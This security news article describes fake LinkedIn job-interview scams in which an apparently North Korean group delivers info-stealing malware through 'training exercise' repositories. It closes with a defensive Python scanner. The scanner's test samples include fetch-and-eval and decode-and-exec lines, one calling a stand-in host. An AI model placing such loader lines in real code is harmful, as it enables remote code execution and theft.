If a job interview ever comes with a request to download software — best to avoid it.
Phishing scams or social engineering attempts to get people to install malware may not be the newest cybersecurity trend, but what is startling is how sophisticated these are becoming in 2025.
In this virtual version of the ‘long con,’ security experts, including Bitdefender Labs, warn of job interview scams, which usually involve unsolicited job interview offers. If job seekers accept these legitimate-sounding requests, often originating on LinkedIn, they find themselves speaking to different fictitious ‘employees’ of a legitimate-seeming company, everyone from the Human Resources team to their future manager.
The overall aim of this catfishing with a jobseeker twist is to get the applicant to download malware disguised as a training exercise or work tool, steal their personal information, and, in some cases, drain their digital wallets.
One of the most advanced scams yet appears linked to the North Korean hacker group Lazarus, which allegedly steals more than $300m in cryptocurrency annually.
Key Takeaways
- A new LinkedIn job scam uses fake recruiters to create a convincing facade of a new career move.
- After passing initial tests, victims are tricked into downloading malicious “training exercises.”
- The scam is thought to be linked to the North Korean hacking group Lazarus. It aims to install info-stealer malware that targets browser data and crypto wallets.
- Some scams offer fake training courses towards the end of a selection process, for a certification that does not exist.
- To stay safe, never download software for an interview.
Real-Life Victims & Bitdefender Investigation
LinkedIn is full of posts from people who have been duped (or nearly duped) into downloading software during an interview, as well as reports of fake recruiters on LinkedIn trying many paths to extract data or dollars from job seekers.
The Khaleej Times reported the story of ‘T Jonas,’ who passed the first round of a job interview before being informed he needed additional certification to proceed. Once he had paid $1,900 to a recommended “institution,” the recruiter vanished.
His tale is not the first, nor will it be the last:
Ironically, one such phishing attempt was exposed when a malicious recruitment operation targeted a Bitdefender employee via LinkedIn.
Turning the tables, Bitdefender followed the attempt through and found that the test exercises they were sent contained cross-platform info-stealers, compatible with Windows, macOS, and Linux operating systems, that were designed to steal their crypto keys for popular wallets, including MetaMask, Phantom, TonWallet, and Crypto.com.
With the lure of a high compensation package, remote work, flexible hours, and a meeting with the CEO — who could resist? — the final stage of the interview, where the hackers hope you take the bait, was a training exercise that required a quick download to complete.
According to Bitdefender researchers, “After receiving the requested information, the criminal shared a repository containing the project’s ‘minimum viable product’ (MVP). He also included a document with questions that can only be answered by executing the demo.
“At first glance, the code appears harmless. However, closer inspection reveals a heavily obfuscated script that dynamically loads malicious code from a third-party endpoint.”
A Job Offer With More Than You Bargained For
Once the code was deployed, Bitdefender found an info-stealer payload delivered to their computer, which proceeded to hunt for the browser extensions of popular cryptocurrency wallets.
The info-stealer also collected browser login data and sent the information to a malicious IP address.
It didn’t stop there. Finally, it downloaded and executed a host of Python scripts, beginning with one called main99_65.py, to allow for further exfiltration activities, including hooking keyboard events and monitoring a user’s clipboard before sending the content back.
The files included:
Bitdefender said: “The threat actors’ infection chain is complex, containing malicious software written in multiple programming languages and using a variety of technologies.
“[These include] multi-layered Python scripts that recursively decode and execute themselves, a JavaScript stealer that first harvests browser data before pivoting to further payloads, and .NET-based stagers capable of disabling security tools, configuring a Tor proxy, and launching crypto miners.”
Bitdefender engaged with the hackers in a secured environment, which allowed its researchers to follow the ploy through, and said the malware and operational tactics “strongly suggests the involvement of state-sponsored threat actors, specifically those from North Korea.”
Bitdefender added: “While we’ve discussed malicious job offers, it has been observed that the same threat actors have tried to infiltrate various companies by faking identities and applying for a multitude of job positions.
“The result would be approximately the same: private information, credentials, and technology would be exfiltrated by corporate spies.”
How to Stay Safe From Scam Job Adverts
- Watch out for vague job descriptions, particularly unsolicited ones that are not advertised elsewhere.
- Watch out for poor spelling and grammar in emails and direct messages.
- Treat any attachments, including PDFs and DOC files, as suspicious, and make sure your computer has up-to-date virus scanners.
- Exercise extreme caution if a recruiter suggests a non-standard video chat or instant messaging program for conversations — stick with Zoom, Skype, Microsoft Teams, or Google Meet (and be suspicious of files sent over those applications, too).
- Remember that an interviewer should never ask you to download a GitHub repository or similar, or to install a program.
- If you must run code of some kind, use a virtual machine or a sandbox mode.
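As an added example (not Bitdefender's tooling and not part of the original article), a read-only pre-check along these lines can flag the traits Bitdefender describes, an obfuscated script that loads code from a remote endpoint and Python layers that decode and execute themselves, before a repository is opened even in a sandbox. The patterns, the 1,000-character threshold and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics chosen for this example (assumptions, not Bitdefender's signatures).
PATTERNS = {
    "dynamic-exec": re.compile(r"\b(eval|exec|Function)\s*\("),
    "decode-layer": re.compile(r"\b(atob|b64decode|decompress)\s*\(|['\"]base64['\"]"),
    "remote-fetch": re.compile(r"\b(fetch|urlopen|get)\s*\(|https?://"),
}
LONG_LINE = 1000  # packed or obfuscated code often sits on one very long line
SOURCE_EXT = {".js", ".mjs", ".cjs", ".py"}

def scan_repo(root):
    """Read-only pass: {relative_path: {finding: first_line_number}}; nothing is run."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix not in SOURCE_EXT:
            continue
        hits = {}
        for no, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            if len(line) > LONG_LINE:
                hits.setdefault("long-line", no)
            for name, rx in PATTERNS.items():
                if rx.search(line):
                    hits.setdefault(name, no)
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def high_risk(report):
    """Files that pair dynamic execution with a download or a decode step."""
    return sorted(f for f, h in report.items()
                  if "dynamic-exec" in h and h.keys() & {"remote-fetch", "decode-layer"})

def build_sample(root):
    """Write a constructed, inert sample repo (example.invalid never resolves)."""
    root = Path(root)
    (root / "setup.js").write_text(
        'fetch("https://example.invalid/c").then(r => r.text()).then(t => eval(t));\n')
    (root / "loader.py").write_text('blob = b""\nexec(zlib.decompress(base64.b64decode(blob)))\n')
    (root / "app.js").write_text('console.log("demo");\nvar _0x = "' + "a" * 1200 + '";\n')
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        report = scan_repo(build_sample(tmp))
        print(report)
        print("review first:", high_risk(report))
```

A clean result only means these heuristics found nothing, so the virtual machine advice above still applies.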
The Bottom Line
In many ways, these are old tricks — trying any method to get malware onto your machine.
Whether it is phishing for personal information, extracting money from you for training courses, or scanning your machine in the hopes of finding cryptocurrency, there is valuable content sitting on most of our hard drives.
What is different here, however, is the amount of effort hackers are willing to invest when spearphishing a target, from multiple calls with various people to legitimate-looking documents and websites and training exercises built from the ground up to look convincing.
So next time you are bracing yourself for a job interview, which is stressful enough already, ensure the company you are talking to is not a house of cards.
References
- UAE: Some applicants lose money, job offers after being ‘tricked’ into getting certification – News (Khaleej Times)
- Alyce Mitchell on LinkedIn: I want to share an unfortunate experience to help others avoid falling… (LinkedIn)
- Lazarus Group Targets Organizations with Sophisticated LinkedIn Recruiting Scam (Bitdefender)